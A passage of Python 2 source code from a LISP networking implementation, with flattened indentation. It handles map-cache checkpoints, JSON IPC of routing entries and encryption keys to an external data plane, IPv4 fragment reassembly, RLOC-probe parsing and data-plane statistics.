mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsualted packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happensu
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If are an RTR, we can process the stats directly. If are an ITR we need
# to send an IPC message the the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x.q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
